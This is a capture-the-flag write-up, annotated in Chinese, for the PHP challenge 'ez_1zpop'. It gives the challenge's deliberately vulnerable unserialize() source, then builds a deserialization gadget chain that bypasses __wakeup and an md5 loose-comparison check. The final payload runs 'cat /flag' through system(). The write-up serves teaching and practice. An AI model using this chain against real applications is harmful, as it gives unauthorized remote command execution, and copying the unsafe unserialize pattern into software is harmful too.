[SWPUCTF 2022 新生赛]ez_1zpop
<?php
// Silence all PHP diagnostics (notices, warnings, uncaught-error messages) for the challenge page.
error_reporting(0);
class dxg
{
    /**
     * Harmless "dead end" sink of the challenge.
     *
     * lt::__wakeup() and lt::__construct() point `impo` at an instance of
     * this class, so reaching fmm() here only produces a fixed string.
     *
     * @return string always 'nonono'
     */
    function fmm()
    {
        $reply = 'nonono';

        return $reply;
    }
}
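class lt
{
    public $impo='hi';
    public $md51='weclome';
    public $md52='to NSS';

    /**
     * Normal construction always points `impo` at the harmless dxg sink.
     */
    function __construct()
    {
        $this->impo = new dxg;
    }

    /**
     * Runs after unserialize(): resets `impo` to dxg so a deserialized object
     * should not be able to carry a different class into __toString().
     *
     * NOTE(review): this reset is the only guard on the chain; on PHP builds
     * affected by the property-count __wakeup bypass (serialized count larger
     * than the real property count) it never runs at all.
     *
     * @return string dxg::fmm()'s fixed string (ignored by the engine)
     */
    function __wakeup()
    {
        $this->impo = new dxg;
        return $this->impo->fmm();
    }

    /**
     * Delegates to `impo->fmm()` when the md5 gate passes.
     *
     * The gate compares md5 hex digests with loose `==`: two different inputs
     * whose digests are numeric strings like "0e..." compare equal to 0, so the
     * `md51 != md52` clause still holds. That is the challenge's intended
     * weakness and is left as written; real code must use `===` / hash_equals().
     *
     * Fixed: __toString() must return a string. The original fell through with
     * null when the gate failed, which makes `echo $this` in __destruct()
     * throw an Error; an empty string is returned instead, and the delegated
     * result is cast so a void fmm() cannot break the contract either.
     *
     * @return string
     */
    function __toString()
    {
        if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52) {
            return (string) $this->impo->fmm();
        }

        return '';
    }

    /**
     * Triggers __toString() (and thus `impo->fmm()`) when the object is freed —
     * including at script end after unserialize().
     */
    function __destruct()
    {
        echo $this;
    }
}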
class fin
{
    public $a;
    public $url = 'https://www.ctfer.vip';
    public $title;

    /**
     * Invokes whatever `$a` names as a callable with `$title` as its only
     * argument. Neither value is validated and both are public properties,
     * so once an instance is produced by unserialize() of request data this
     * method is an arbitrary-function-call sink.
     *
     * @return void
     */
    function fmm()
    {
        ($this->a)($this->title);
    }
}
// Entry point: the NSS query parameter is handed straight to unserialize().
// NOTE(review): unserialize() of request-controlled data may instantiate any
// class declared above and runs its magic methods (__wakeup, __toString,
// __destruct) on attacker-chosen property values. Outside a CTF, pass
// ['allowed_classes' => false] or use json_decode() for untrusted input.
if (!isset($_GET['NSS'])) {
    highlight_file(__FILE__);
} else {
    $Data = unserialize($_GET['NSS']);
}
先找可利用的点
// Excerpt of fin::fmm() from the challenge source above, shown outside its class.
function fmm()
{
// $this->a is a public property, so its value comes straight from the unserialized input.
$b = $this->a;
// $b is then invoked as a callable with $this->title as its only argument.
$b($this->title);
}
把 $b 当做函数调用了，$b 的值为 $this->a；调用形式为 $b($this->title)，例如 system()
可以利用这个,将a的值提前写好为system,title为ls cat flag啥的
$b就会被赋值为system,内容为ls
在 lt 类中触发 __wakeup，会指向一个没有用的类，要绕过一下
梳理下来，就是 __construct -> __toString -> __destruct
<?php
// Silence all PHP diagnostics while generating the serialized string.
error_reporting(0);
class lt
{
    // Assigned from the outside to the fin instance that becomes the target.
    public $impo = null;
    // Two distinct strings whose md5 digests both begin with "0e"; the
    // challenge's loose `md5(...) == md5(...)` check treats them as equal
    // while `md51 != md52` still holds.
    public $md51 = "s878926199a";
    public $md52 = "s155964671a";
}
class fin
{
    // Callable name consumed by the challenge's fin::fmm().
    public $a = "system";
    public $url = "https://www.ctfer.vip";
    // Argument handed to that callable.
    public $title = "ls /";
}
// Build the outer lt object, nest the fin instance in `impo`, and print the
// serialized chain; the expected output is kept in the trailing comment.
$a = new lt();
$a->impo = new fin();
print serialize($a);
//O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:4:"ls /";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}
最终 payload
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s878926199a";s:4:"md52";s:11:"s155964671a";}